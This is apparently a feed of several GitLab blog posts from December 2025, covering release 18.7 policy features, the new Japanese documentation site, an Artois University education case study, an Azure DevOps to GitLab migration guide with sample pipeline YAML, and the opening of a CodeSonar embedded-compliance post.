Administrators of GitLab Self-Managed and GitLab Dedicated can now control which projects are allowed to publish components to the CI/CD Catalog. This new setting helps organizations maintain a curated, trusted ecosystem by ensuring only approved sources can add components. It strengthens governance for enterprise customers who want to preserve control over their CI/CD landscape while still enabling teams to discover and reuse sanctioned components.

## Platform Security

As automation and pipeline workflows become more efficient, it remains essential that teams maintain strong visibility and control over how code changes meet organizational standards. The Platform Security update in 18.7 reinforces this balance by giving teams a more flexible way to introduce and refine policy guidance without interrupting delivery.

**Warn Mode for MR Approval Policies**

Warn Mode for MR Approval Policies allows violations to be surfaced without blocking merges, giving teams a lower-friction way to introduce or adjust policies while assessing their impact before full enforcement. It also supports a guidance-based approach, where developers can review or dismiss violations with all actions audited to help AppSec refine policy effectiveness. Beyond merge requests, violations already present in or introduced into the default branch now appear with a visual badge in the Vulnerability Report, making it easier to identify and prioritize issues that break policy.

## Elevating how teams build, secure, and deliver software

The 18.7 release is about strengthening the foundation for reliable, flexible automation across your GitLab environment. GitLab Premium and Ultimate users can start using these capabilities today on GitLab.com and self-managed environments, with availability for GitLab Dedicated customers planned for next month.

GitLab Duo Agent Platform is currently in **beta** — enable beta and experimental features to experience how full-context AI can transform the way your teams build software. New to GitLab? Start your free trial and see why the future of development is AI-powered, secure, and orchestrated through the world's most comprehensive DevSecOps platform.

_**Note:** Platform capabilities that are in beta are available as part of the GitLab Beta program. They are free to use during the beta period, and when generally available, they will be made available with a paid add-on option for GitLab Duo Agent Platform._

### Stay up to date with GitLab

To make sure you're getting the latest features, security updates, and performance improvements, we recommend keeping your GitLab instance up to date. The following resources can help you plan and complete your upgrade:

* Upgrade Path Tool – enter your current version and see the exact upgrade steps for your instance
* Upgrade Documentation – detailed guides for each supported version, including requirements, step-by-step instructions, and best practices

By upgrading regularly, you'll ensure your team benefits from the newest GitLab capabilities and remains secure and supported. For organizations that want a hands-off approach, consider GitLab's Managed Maintenance service. With Managed Maintenance, your team stays focused on innovation while GitLab experts keep your Self-Managed instance reliably upgraded, secure, and ready to lead in DevSecOps. Ask your account manager for more information.
_This blog post contains "forward‑looking statements" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption "Risk Factors" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law._
about.gitlab.com
December 18, 2025 at 10:42 PM
How we built and automated our new Japanese GitLab Docs site
Today we are thrilled to announce the release of GitLab product documentation in Japanese at docs.gitlab.com/ja-jp. This major step marks our first move toward making GitLab's extensive documentation accessible to our users worldwide.

## The unique challenge of the Japanese market

Japan represents one of the world's largest economies and is a critical market for enterprise software. However, it also presents a distinctive challenge: despite its technological sophistication and massive developer community, English proficiency remains a significant barrier for many users. Japan's developers and DevSecOps teams often face challenges with English-only documentation, as indicated by the country's ranking on the EF English Proficiency Index. This language barrier can significantly impact the speed of learning and ultimately influence the decision to evaluate, adopt, and champion a platform within Japanese organizations.

We've heard directly from our Japanese customers and partners that English-only documentation wasn't merely an inconvenience; it was a barrier preventing them from getting the most out of GitLab. The impact rippled through every stage of the user journey: from initial evaluation, where teams struggled to assess GitLab's capabilities, to daily operations, where finding solutions took longer than necessary, to staying current with new features and best practices.

In a market as competitive and mature as Japan's, this language barrier directly affected GitLab's market penetration. When Japanese companies evaluate enterprise software, the availability of comprehensive Japanese documentation signals long-term commitment to the market. It demonstrates that a provider isn't just making a token effort, but is genuinely invested in supporting Japanese users throughout their entire journey. To address this challenge and demonstrate our commitment to the Japanese market, we built localization infrastructure from the ground up, integrating with how we create and maintain documentation at GitLab.

## Localization built on docs-as-code principles

GitLab's documentation is treated like any other code contribution, residing alongside product code in GitLab projects and managed via merge requests. This system ensures documentation is version-controlled, collaboratively reviewed, and automatically tested through CI/CD pipelines, which include checks for issues with language, formatting, and links. Both the English and Japanese documentation sites are dynamically generated using the Hugo static site generator and deployed after merging changes, guaranteeing users always access the latest information.

The documentation is extensive and comprehensive, drawing content from various source projects, including GitLab, GitLab Runner, Omnibus GitLab, GitLab Charts, GitLab Operator, and GitLab CLI (glab) (see architecture for details). This sheer scale and rapid update velocity presented a significant localization challenge. To keep pace with the continuous evolution of these English source projects, we had to design a localization infrastructure for our GitLab product documentation that could handle these unique complexities and provide an enterprise-grade solution for a fully localized site, all while adhering to our CI/CD pipeline requirements.

## How we localized GitLab Documentation

For our initial Japanese localization, we adopted a strategy of integrating new folders within our existing English content structure.
Specifically, we introduced `doc-locale/ja-jp` folders within each project that stores source Markdown files. This architecture keeps the translations right alongside their source content while maintaining a clear organizational separation. Not only that, but it also enables us to apply the same robust version control, established review and collaboration workflows, and even some of the automated quality checks used for our English documentation to the translated content.

This internationalization infrastructure built for the Japanese documentation provides a scalable foundation for future language expansion. With the architecture, tooling, and processes now in place, we are well-positioned to support additional languages as we continue our commitment to making GitLab accessible to users worldwide.

## An AI-assisted translation workflow that balances speed and quality

We adopted a strategic, phased approach to processing the content through translation, prioritizing pages based on their English-language page views. The highest-traffic pages underwent AI translation first, followed by comprehensive human linguistic review, and we intentionally paused subsequent phases until these priority pages completed the full human review cycle. This deliberate sequencing allowed us to build a robust, curated translation memory and termbase from our most important content. These linguistic assets accelerated and improved quality across all remaining content. In parallel, this initial phase served as a testing ground for the technical infrastructure on the GitLab side. We used it to iterate on and reinforce our CI/CD pipelines, refine our translation and post-editing AI scripts, and solidify our Translation MR review process.

To provide our international users with the most current documentation while guaranteeing high-quality translated content, we implemented an AI-assisted translation workflow with human post-editing, consisting of:

* **Phase 1: AI-powered translation.** We built a custom AI translation system enriched with GitLab-specific context, including style guides, GitLab UI content translations, terminology databases, and original file context. This system intelligently handles GitLab's specialized Markdown syntax (GLFM) and protects elements like placeholder variables, alert boxes, Hugo shortcodes, and GitLab-specific references that standard translation tools can't process out of the box.
* **Phase 2: Human linguistic review.** Professional Japanese translators specialized in technical content then review and refine the AI translations. They work with GitLab's Japanese style guide, translation memory, and terminology database to ensure accuracy, natural language flow, and cultural appropriateness. These human-reviewed translations progressively replace the AI versions on the site.

## Technical challenges and solutions

Localizing GitLab's extensive documentation, while maintaining our docs-as-code principles and CI/CD-driven publishing workflow, required significant technical innovation. The challenges extended beyond translation itself: we needed to preserve complex Markdown syntax, maintain automated testing standards, ensure seamless content fallbacks, and create sustainable processes for continuous updates across multiple source projects.

The complexity of the English **Markdown file syntax** led us to develop custom code and regexes in our Translation Management System (TMS) to protect code blocks, URLs, and other functional elements that should not be exposed for translation.

Due to the dynamics of how the English content is generated, we established an **English fallback mechanism.** Essentially, when a Japanese translation is not ready yet, the localized site seamlessly displays English content with translated navigation and UI, preventing 404s and maintaining language context via Hugo's rendering system.
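For context, Hugo's multilingual support is configured at the site level. Here is a minimal sketch of the kind of language configuration such a site might use (illustrative only, not GitLab's actual configuration; the directory paths are assumptions based on the folder layout described above):

```yaml
# hugo.yaml (illustrative): register English and Japanese content trees.
defaultContentLanguage: en
languages:
  en:
    languageName: English
    weight: 1
  ja-jp:
    languageName: 日本語
    weight: 2
    # Hypothetical per-language content directory mirroring the
    # doc-locale/ja-jp layout described in this post.
    contentDir: doc-locale/ja-jp
```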
We enhanced the localized navigation and linking so that they adjust dynamically and persist the locale.

We added **anchor IDs** to the translated files by pre-processing the English file before it's sent for translation. That improves the experience for people navigating to a docs page from a link: the consistent anchor ID means they can switch between languages and still land in the correct place on the page.

We also extended our CI/CD pipelines to test localized content in Translation MRs against the same quality standards as the English docs. This allows us to catch invalid Hugo shortcodes, spaces inside links, or bare URLs. It also identifies orphaned files and redirect files with no target files. You can see the jobs that run on the MRs containing translated documentation in the GitLab project's `.gitlab/ci/docs.gitlab-ci.yml` file.

A centralized translation request system orchestrates the workflow: it monitors the English files, identifies new and updated content, routes files for translation, automatically creates translation merge requests, tracks file status in translation requests, and maintains an audit trail. To get the docs translated, we processed 430 Translation MRs, each containing between one and 10 files.

The result is a Japanese documentation experience that stays synchronized with English content updates, giving users faster access to critical information. Users can discover and navigate content fully in their language, with English appearing only for content that's still in translation. They can trust GitLab's quality standards while accessing the latest features quickly. All of this creates a sustainable, scalable foundation for future languages and documentation growth. Learn more about all the technical details in our GitLab Product Documentation Handbook page.

## Visit our Japanese docs site

Whether you're a longtime GitLab user or just getting started, we hope this localized documentation makes your DevSecOps journey smoother and more accessible. This is just the beginning of our localization efforts, and your feedback is invaluable in helping us improve. If you notice any translation issues, have suggestions for improvement, or simply want to share your experience using the Japanese documentation, please don't hesitate to reach out. You can provide comments in our feedback issue.

As we continue evolving this localization infrastructure, our immediate priorities include enhancing the search experience for Japanese users and accelerating our continuous localization workflow to minimize the time gap between English updates and their Japanese translations. Thank you to our Japanese community for your continued support and patience as we work to serve you better. We're committed to making GitLab the best DevSecOps platform for Japanese teams, and comprehensive Japanese documentation is a crucial step in that journey.

> Start exploring today at docs.gitlab.com/ja-jp!
about.gitlab.com
December 12, 2025 at 10:41 PM
Artois University elevates research and curriculum with GitLab Ultimate for Education
Leading academic institutions face a critical challenge: how to provide thousands of students and researchers with industry-standard, **full-featured DevSecOps tools** without compromising institutional control. Many start with basic version control, but the modern curriculum demands integrated capabilities for planning, security, and advanced CI/CD. The **GitLab for Education program** is designed to solve this by providing access to **GitLab Ultimate** for qualifying institutions, allowing them to scale their operations and elevate their academic offerings.

This article showcases a powerful success story from the **Centre de Recherche en Informatique de Lens (CRIL)**, a joint laboratory of **Artois University** and CNRS in France. After years of relying solely on GitLab Community Edition (CE), the university's move to GitLab Ultimate through the GitLab for Education program immediately unlocked advanced capabilities, transforming their teaching, research, and contribution workflows virtually overnight. This story demonstrates why GitLab Ultimate is essential for institutions seeking to deliver advanced computer science and research curricula.

## GitLab Ultimate unlocked: Managing scale and driving academic value

**Artois University's** self-managed GitLab instance is a large-scale operation, supporting nearly **3,000 users** across approximately **19,000 projects**, primarily serving computer science students and researchers. While GitLab Community Edition was robust, the upgrade to GitLab Ultimate provided the sophisticated tooling necessary for managing this scale and facilitating advanced university-level work.

_**"We can see the difference," says Daniel Le Berre, head of research at CRIL and the instance maintainer. "It's a completely different product. Each week reveals new features that directly enhance our productivity and teaching."**_

The institution joined the GitLab for Education program specifically because it covers both **instructional and non-commercial research use cases** and offers full access to Ultimate's features, removing significant cost barriers.

### Key GitLab Ultimate benefits for students and researchers

* **Advanced project management at scale:** Master's students now benefit from **GitLab Ultimate's project planning features**. This enables them to structure, track, and manage complex, long-term research projects using professional methodologies like portfolio management and advanced issue tracking that seamlessly roll up across their thousands of projects.
* **Enhanced visibility:** Features like improved dashboards and code previews directly in Markdown files dramatically streamline tracking and documentation review, reducing administrative friction for both instructors and students managing large project loads.

## Comprehensive curriculum: From concepts to continuous delivery

GitLab Ultimate is deeply integrated into the computer science curriculum, moving students beyond simple `git` commands to practical **DevSecOps implementation**.

* **Git fundamentals:** Students begin with open-source visualization tools to master Git concepts.
* **Full CI/CD implementation:** Students use GitLab CI for rigorous **Test-Driven Development (TDD)** in their software projects. They learn to build, test, and perform quality assurance using unit and integration testing pipelines (see the sketch after this list), a core competency made seamless by the integrated platform.
* **DevSecOps for research and documentation:** The university teaches students that DevSecOps principles are vital for all collaborative work. Inspired by earlier work in Delft, students manage and produce critical research documentation (PDFs from Markdown files) using GitLab, incorporating quality checks like linters and spell checks directly in the CI pipeline. This ensures high-quality, reproducible research output.
* **Future-proofing security skills:** The GitLab Ultimate platform immediately positions the institution to incorporate advanced DevSecOps features like SAST and DAST scanning as their research and development code projects grow, ensuring students are prepared for industry security standards.
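As referenced in the list above, a student TDD pipeline might look roughly like the following. This is an illustrative sketch, not a pipeline from the Artois curriculum (the Maven project layout and image tag are assumptions):

```yaml
stages:
  - build
  - test

build:
  stage: build
  image: maven:3.9-eclipse-temurin-17
  script:
    - mvn --batch-mode compile

unit-tests:
  stage: test
  image: maven:3.9-eclipse-temurin-17
  script:
    - mvn --batch-mode test
  artifacts:
    reports:
      # Surfaces test results in the merge request widget.
      junit: target/surefire-reports/TEST-*.xml
```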
## Accelerating open source contributions with GitLab Duo

Access to the full GitLab platform, including our AI capabilities, has empowered students to make impactful contributions to the wider open source community faster than ever before. Two Master's students recently completed direct contributions to the GitLab product, adding the **ORCID identifier** to user profiles. Working on GitLab.com, they leveraged **GitLab Duo's AI chat and code suggestions** to navigate the codebase efficiently.

_**"This would not have been possible without GitLab Duo," Daniel Le Berre notes. "The AI features helped students, who might have lacked deep codebase knowledge, deliver meaningful contributions in just two weeks."**_

This demonstrates how providing students with cutting-edge tools **accelerates their learning and impact**, allowing them to translate classroom knowledge into real-world contributions immediately.

## Empowering open research and institutional control

The stability of the self-managed instance at Artois University is key to its success. This model guarantees **institutional control and stability** — a critical factor for long-term research preservation. The institution's expertise in this area was recently highlighted in a major 2024 study led by CRIL, titled "Higher Education and Research Forges in France - Definition, uses, limitations encountered and needs analysis" (Project on GitLab). The research found that the vast majority of public forges in French Higher Education and Research relied on **GitLab**. This finding underscores the consensus among academic leaders that self-hosted solutions are essential for **data control and longevity**, especially when compared to relying on external, commercial forges.

## Unlock GitLab Ultimate for your institution today

The success story of **Artois University's CRIL** proves the transformative power of the GitLab for Education program. By providing **free access to GitLab Ultimate**, we enable large-scale institutions to:

1. **Deliver a modern, integrated DevSecOps curriculum.**
2. **Support advanced, collaborative research projects with Ultimate planning features.**
3. **Empower students to make AI-assisted open source contributions.**
4. **Maintain institutional control and data longevity.**

If your academic institution is ready to equip its students and researchers with the complete DevSecOps platform and its most advanced features, we invite you to join the program. The program provides **free access to GitLab Ultimate** for qualifying instructional and non-commercial research use cases.

**Apply now at https://about.gitlab.com/solutions/education/join/.**
about.gitlab.com
December 10, 2025 at 10:43 PM
Guide: Migrate from Azure DevOps to GitLab
Migrating from Azure DevOps to GitLab can seem like a daunting task, but with the right approach and tools, it can be a smooth and efficient process. This guide will walk you through the steps needed to successfully migrate your projects, repositories, and pipelines from Azure DevOps to GitLab.

## Overview

GitLab provides both Congregate (maintained by the GitLab Professional Services organization) and a built-in Git repository import for migrating projects from Azure DevOps (ADO). These options support repository-by-repository or bulk migration and preserve Git commit history, branches, and tags. With Congregate and Professional Services tools, we support additional assets such as wikis, work items, CI/CD variables, container images, packages, pipelines, and more (see this feature matrix). Use this guide to plan and execute your migration and complete post-migration follow-up tasks.

Enterprises migrating from ADO to GitLab commonly follow a multi-phase approach:

* Migrate repositories from ADO to GitLab using Congregate or GitLab's built-in repository migration.
* Migrate pipelines from Azure Pipelines to GitLab CI/CD.
* Migrate remaining assets such as boards, work items, and artifacts to GitLab Issues, Epics, and the Package and Container Registries.

High-level migration phases:

```mermaid
graph LR
  subgraph Prerequisites
    direction TB
    A["Set up identity provider (IdP) and<br/>provision users"]
    A --> B["Set up runners and<br/>third-party integrations"]
    B --> I["User enablement and<br/>change management"]
  end
  subgraph MigrationPhase["Migration phase"]
    direction TB
    C["Migrate source code"]
    C --> D["Preserve contributions and<br/>format history"]
    D --> E["Migrate work items and<br/>map to <a href='https://docs.gitlab.com/topics/plan_and_track/'>GitLab Plan<br/>and track work</a>"]
  end
  subgraph PostMigration["Post-migration steps"]
    direction TB
    F["Create or translate<br/>ADO pipelines to GitLab CI"]
    F --> G["Migrate other assets:<br/>packages and container images"]
    G --> H["Introduce <a href='https://docs.gitlab.com/user/application_security/secure_your_application/'>security</a> and<br/>SDLC improvements"]
  end
  Prerequisites --> MigrationPhase
  MigrationPhase --> PostMigration
  style A fill:#FC6D26
  style B fill:#FC6D26
  style I fill:#FC6D26
  style C fill:#8C929D
  style D fill:#8C929D
  style E fill:#8C929D
  style F fill:#FFA500
  style G fill:#FFA500
  style H fill:#FFA500
```

## Planning your migration

**To plan your migration, ask these questions:**

* How soon do we need to complete the migration?
* Do we understand what will be migrated?
* Who will run the migration?
* What organizational structure do we want in GitLab?
* Are there any constraints, limitations, or pitfalls that need to be taken into account?

Determine your timeline, as it will largely dictate your migration approach. Identify champions or groups familiar with both the ADO and GitLab platforms (such as early adopters) to help drive adoption and provide guidance.

**Inventory what you need to migrate:**

* The number of repositories, pull requests, and contributors
* The number and complexity of work items and pipelines
* Repository sizes and dependency relationships
* Critical integrations and runner requirements (agent pools with specific capabilities)

Use GitLab Professional Services' Evaluate tool to produce a complete inventory of your entire Azure DevOps organization, including repositories, PR counts, contributor lists, number of pipelines, work items, CI/CD variables, and more.
If you're working with the GitLab Professional Services team, share this report with your engagement manager or technical architect to help plan the migration.

Migration timing is primarily driven by pull request count, repository size, and the amount of contributions (e.g., PR comments and work items). For example, 1,000 small repositories with few PRs and limited contributors can migrate much faster than a smaller set of repositories containing tens of thousands of PRs and thousands of contributors. Use your inventory data to estimate effort and plan test runs before proceeding with production migrations.

Compare the inventory against your desired timeline and decide whether to migrate all repositories at once or in batches. If teams cannot migrate simultaneously, batch and stagger migrations to align with team schedules. For example, in Professional Services engagements, we organize migrations into waves of 200-300 projects to manage complexity and respect API rate limits, both in GitLab and ADO.

GitLab's built-in repository importer migrates Git repositories (commits, branches, and tags) one by one. Congregate is designed to preserve pull requests (known in GitLab as merge requests), comments, and related metadata where possible; the simple built-in repository import focuses only on the Git data (history, branches, and tags).

**Items that typically require separate migration or manual recreation:**

* Azure Pipelines - create equivalent GitLab CI/CD pipelines (consult the CI/CD YAML reference and/or CI/CD components). Alternatively, consider using the AI-based pipeline conversion available in Congregate.
* Work items and boards - map to GitLab Issues, Epics, and Issue Boards.
* Artifacts and container images (ACR) - migrate to the GitLab Package Registry or Container Registry.
* Service hooks and external integrations - recreate in GitLab.
* Permissions models differ between ADO and GitLab; review and plan permissions mapping rather than assuming exact preservation.

Review what each tool (Congregate vs. built-in import) will migrate and choose the one that fits your needs. Make a list of any data or integrations that must be migrated or recreated manually.

**Who will run the migration?**

Migrations are typically run by a GitLab group owner or instance administrator, or by a designated migrator who has been granted the necessary permissions on the destination group/project. Congregate and the GitLab import APIs require valid authentication tokens for both Azure DevOps and GitLab.

* Decide whether a group owner/admin will perform the migrations or whether you will grant a specific team/person delegated access.
* Ensure the migrator has correctly configured personal access tokens (Azure DevOps and GitLab) with the scopes required by your chosen migration tool (for example, the `api` and `read_repository` scopes, plus any tool-specific requirements).
* Test tokens and permissions with a small pilot migration.

**Note:** Congregate leverages file-based import functionality for ADO migrations and requires instance administrator permissions to run (see our documentation). If you are migrating to GitLab.com, consider engaging Professional Services; for more information, see the Professional Services Full Catalog. A non-admin account cannot preserve contribution attribution.

**What organizational structure do we want in GitLab?**

While it's possible to map the ADO structure directly to a GitLab structure, it's recommended to rationalize and simplify the structure during migration.
Consider how teams will work in GitLab and design the structure to facilitate collaboration and access management. Here is a way to think about mapping ADO structure to GitLab structure:

```mermaid
graph TD
  subgraph GitLab
    direction TB
    A["Top-level Group"]
    B["Subgroup (optional)"]
    C["Projects"]
    A --> B
    A --> C
    B --> C
  end
  subgraph AzureDevOps["Azure DevOps"]
    direction TB
    F["Organizations"]
    G["Projects"]
    H["Repositories"]
    F --> G
    G --> H
  end
  style A fill:#FC6D26
  style B fill:#FC6D26
  style C fill:#FC6D26
  style F fill:#8C929D
  style G fill:#8C929D
  style H fill:#8C929D
```

Recommended approach:

* Map each ADO organization to a GitLab group (or a small set of groups), not to many small groups. Avoid creating a GitLab group for every ADO team project; use migration as an opportunity to rationalize your GitLab structure.
* Use subgroups and project-level permissions to group related repositories.
* Manage access to sets of projects by using GitLab groups and group membership (groups and subgroups) rather than one group per team project.
* Review GitLab permissions and consider SAML Group Links to implement an enterprise RBAC model for your GitLab instance (or a GitLab.com namespace).

**ADO Boards and work items: State of migration**

It's important to understand how work items migrate from ADO into GitLab Plan (issues, epics, and boards):

* ADO Boards and work items map to GitLab Issues, Epics, and Issue Boards. Plan how your workflows and board configurations will translate.
* ADO Epics and Features become GitLab Epics.
* Other work item types (e.g., user stories, tasks, bugs) become project-scoped issues.
* Most standard fields are preserved; selected custom fields can be migrated when supported.
* Parent-child relationships are retained so Epics reference all related issues.
* Links to pull requests are converted to merge request links to maintain development traceability.

Example: Migration of an individual work item to a GitLab Issue, including field accuracy and relationships.

Batching guidance:

* If you need to run migrations in batches, use your new group/subgroup structure to define batches (for example, by ADO organization or by product area).
* Use inventory reports to drive batch selection, and test each batch with a pilot migration before scaling.

**Pipelines migration**

Congregate recently introduced AI-powered conversion for multi-stage YAML pipelines from Azure DevOps to GitLab CI/CD. This automated conversion works best for simple, single-file pipelines and is designed to provide a working starting point rather than a production-ready `.gitlab-ci.yml` file. The tool generates a functionally equivalent GitLab pipeline that you can then refine and optimize for your specific needs.

* Converts Azure Pipelines YAML to the `.gitlab-ci.yml` format automatically.
* Best suited for straightforward, single-file pipeline configurations.
* Provides a boilerplate to accelerate migration, not a final production artifact.
* Requires review and adjustment for complex scenarios, custom tasks, or enterprise requirements.
* Does not support Azure DevOps classic release pipelines — convert these to multi-stage YAML first.

Repository owners should review the GitLab CI/CD documentation to further optimize and enhance their pipelines after the initial conversion.
Example of converted pipelines:

```yaml
# azure-pipelines.yml
trigger:
  - main

variables:
  imageName: myapp

stages:
  - stage: Build
    jobs:
      - job: Build
        pool:
          vmImage: 'ubuntu-latest'
        steps:
          - checkout: self
          - task: Docker@2
            displayName: Build Docker image
            inputs:
              command: build
              repository: $(imageName)
              Dockerfile: '**/Dockerfile'
              tags: |
                $(Build.BuildId)

  - stage: Test
    jobs:
      - job: Test
        pool:
          vmImage: 'ubuntu-latest'
        steps:
          - checkout: self
          # Example: run tests inside the container
          - script: |
              docker run --rm $(imageName):$(Build.BuildId) npm test
            displayName: Run tests

  - stage: Push
    jobs:
      - job: Push
        pool:
          vmImage: 'ubuntu-latest'
        steps:
          - checkout: self
          - task: Docker@2
            displayName: Login to ACR
            inputs:
              command: login
              containerRegistry: '<your-acr-service-connection>'
          - task: Docker@2
            displayName: Push image to ACR
            inputs:
              command: push
              repository: $(imageName)
              tags: |
                $(Build.BuildId)
```

```yaml
# .gitlab-ci.yml
variables:
  imageName: myapp

stages:
  - build
  - test
  - push

build:
  stage: build
  image: docker:latest
  services:
    - docker:dind
  script:
    - docker build -t $imageName:$CI_PIPELINE_ID -f $(find . -name Dockerfile) .
  only:
    - main

test:
  stage: test
  image: docker:latest
  services:
    - docker:dind
  script:
    - docker run --rm $imageName:$CI_PIPELINE_ID npm test
  only:
    - main

push:
  stage: push
  image: docker:latest
  services:
    - docker:dind
  before_script:
    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
  script:
    - docker tag $imageName:$CI_PIPELINE_ID $CI_REGISTRY/$CI_PROJECT_PATH/$imageName:$CI_PIPELINE_ID
    - docker push $CI_REGISTRY/$CI_PROJECT_PATH/$imageName:$CI_PIPELINE_ID
  only:
    - main
```
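The converted pipeline above uses the older `only:` keyword. A common post-conversion refinement (our suggestion, not part of the tool's output) is to switch to `rules:`, which GitLab recommends for new pipelines. For example, the `build` job could become:

```yaml
build:
  stage: build
  image: docker:latest
  services:
    - docker:dind
  script:
    - docker build -t $imageName:$CI_PIPELINE_ID -f $(find . -name Dockerfile) .
  rules:
    # Equivalent to `only: [main]`: run only on pushes to the main branch.
    - if: $CI_COMMIT_BRANCH == "main"
```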
   * GitLab Personal Access Token with api and read_repository (plus admin access for file-based imports used by Congregate).
3. Run trial migrations:
   * Repos only: use GitLab's built-in import (Repo by URL)
   * Repos + PRs/MRs and additional assets: use Congregate
4. Post-trial follow-up:
   * Verify repo history, branches, tags; merge requests (if migrated), issues/epics (if migrated), labels, and relationships.
   * Check permissions/roles, protected branches, required approvals, runners/tags, variables/secrets, integrations/webhooks.
   * Validate pipelines (`.gitlab-ci.yml`) or converted pipelines where applicable.
5. Ask users to validate functionality and data fidelity.
6. Resolve issues uncovered during trials and update your runbooks.
7. Network and security:
   * If your destination uses IP allow lists, add the IPs of your migration host and any required runners/integrations so imports can succeed.
8. Run production migrations in waves:
   * Enforce change freezes in ADO during each wave.
   * Monitor progress and logs; retry or adjust batch sizes if you hit rate limits.
9. Optional: remove the sandbox group or archive it after you finish.

<figure class="video_container"> <iframe src="https://www.youtube.com/embed/ibIXGfrVbi4?si=ZxOVnXjCF-h4Ne0N" frameborder="0" allowfullscreen="true"></iframe> </figure>

## Terminology reference for GitLab and Azure DevOps

GitLab | Azure DevOps | Similarities & Key Differences
---|---|---
Group | Organization | Top-level namespace, membership, policies. ADO org contains Projects; GitLab Group contains Subgroups and Projects.
Group or Subgroup | Project | Logical container, permissions boundary. ADO Project holds many repos; GitLab Groups/Subgroups organize many Projects.
Project (includes a Git repo) | Repository (inside a Project) | Git history, branches, tags. In GitLab, a "Project" is the repo plus issues, CI/CD, wiki, etc. One repo per Project.
Merge Request (MR) | Pull Request (PR) | Code review, discussions, approvals. MR rules include approvals, required pipelines, code owners.
Protected Branches, MR Approval Rules, Status Checks | Branch Policies | Enforce reviews and checks. GitLab combines protections + approval rules + required status checks.
GitLab CI/CD | Azure Pipelines | YAML pipelines, stages/jobs, logs. ADO also has classic UI pipelines; GitLab centers on .gitlab-ci.yml.
.gitlab-ci.yml | azure-pipelines.yml | Defines stages/jobs/triggers. Syntax/features differ; map jobs, variables, artifacts, and triggers.
Runners (shared/specific) | Agents / Agent Pools | Execute jobs on machines/containers. Target via demands (ADO) vs tags (GitLab). Registration/scoping differs.
CI/CD Variables (project/group/instance), Protected/Masked | Pipeline Variables, Variable Groups, Library | Pass config/secrets to jobs. GitLab supports group inheritance and masking/protection flags.
Integrations, CI/CD Variables, Deploy Keys | Service Connections | External auth to services/clouds. Map to integrations or variables; cloud-specific helpers available.
Environments & Deployments (protected envs) | Environments (with approvals) | Track deploy targets/history. Approvals via protected envs and manual jobs in GitLab.
Releases (tag + notes) | Releases (classic or pipelines) | Versioned notes/artifacts. GitLab Release ties to tags; deployments tracked separately.
Job Artifacts | Pipeline Artifacts | Persist job outputs. Retention/expiry configured per job or project.
Package Registry (NuGet/npm/Maven/PyPI/Composer, etc.) | Azure Artifacts (NuGet/npm/Maven, etc.) | Package hosting. Auth/namespace differ; migrate per package type.
GitLab Container Registry | Azure Container Registry (ACR) or others | OCI images. GitLab provides per-project/group registries.
Issue Boards | Boards | Visualize work by columns. GitLab boards are label-driven; multiple boards per project/group.
Issues (types/labels), Epics | Work Items (User Story/Bug/Task) | Track units of work. Map ADO types/fields to labels/custom fields; epics at group level.
Epics, Parent/Child Issues | Epics/Features | Hierarchy of work. Schema differs; use epics + issue relationships.
Milestones and Iterations | Iteration Paths | Time-boxing. GitLab Iterations (group feature) or Milestones per project/group.
Labels (scoped labels) | Area Paths | Categorization/ownership. Replace hierarchical areas with scoped labels.
Project/Group Wiki | Project Wiki | Markdown wiki. Backed by repos in both; layout/auth differ slightly.
Test reports via CI, Requirements/Test Management, integrations | Test Plans/Cases/Runs | QA evidence/traceability. No 1:1 with ADO Test Plans; often use CI reports + issues/requirements.
Roles (Owner/Maintainer/Developer/Reporter/Guest) + custom roles | Access levels + granular permissions | Control read/write/admin. Models differ; leverage group inheritance and protected resources.
Webhooks | Service Hooks | Event-driven integrations. Event names/payloads differ; reconfigure endpoints.
Advanced Search | Code Search | Full-text repo search. Self-managed GitLab may need Elasticsearch/OpenSearch for advanced features.
about.gitlab.com
December 3, 2025 at 10:33 PM
Automate embedded systems compliance with GitLab and CodeSonar
Embedded systems development teams face a persistent challenge: maintaining development velocity while meeting stringent functional safety and code quality requirements. Standards like ISO 26262, IEC 62304, DO-178C, and IEC 61508 demand rigorous verification processes that are often manual and time-consuming. Compliance reviews against coding standards like MISRA C/C++, isolated scanning workflows, and post-development verification create bottlenecks. Teams are forced to choose between speed and safety. GitLab's integration with CodeSonar (from AdaCore) addresses this challenge by automating compliance workflows and enabling continuous verification throughout the development lifecycle. ## Specialized scanning for safety-critical systems Safety-critical systems require deep analysis of C/C++ code compiled with specialized embedded tools. These systems must demonstrate compliance with coding standards (MISRA C/C++, CERT C/C++, AUTOSAR C++) and functional safety frameworks (ISO 26262, DO-178C, IEC 61508) that require detailed evidence trails. Beyond aligning with coding standards, teams also need to address security concerns. This means testing for memory problems as well as a host of other problems like uninitialized variables and command injection. CodeSonar performs whole program analysis with specialized scanning capabilities for these standards. Pairing CodeSonar with GitLab enables teams to automate compliance workflows and maintain comprehensive audit trails throughout the development lifecycle. ## Automating compliance from commit to merge The GitLab and CodeSonar integration provides a compliance-as-code approach that automates policy enforcement from the earliest stages of development. CodeSonar functions as an additional scanner within GitLab CI/CD pipelines, analyzing code in every commit and merge request. Because CodeSonar was purpose-built for embedded systems, it performs deep control flow and data flow analysis across entire programs, identifying vulnerabilities like buffer overruns, data taint, uninitialized variables, use-after-free conditions, and command injection — the root causes of most security incidents in embedded systems. The integration works through GitLab's CI/CD configuration. When developers push code changes, the pipeline triggers CodeSonar scanning. For C and C++ firmware, CodeSonar observes compiler invocations during the actual build process, creating an internal representation of the code that enables sophisticated analysis. Results are converted from SARIF format to GitLab's Static Application Security Testing (SAST) format and surfaced directly in merge requests, where they feed into GitLab Ultimate's Security Dashboard, Vulnerability Management, and Compliance Frameworks. ## Example workflow: ISO 26262 ASIL-D compliance The demo video below shows the complete workflow for an embedded system subject to ISO 26262 ASIL-D requirements. The scenario illustrates how embedded development teams can implement continuous compliance without compromising development velocity. 
<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1139086924?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Automated Compliance for Embedded Systems using GitLab and CodeSonar"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

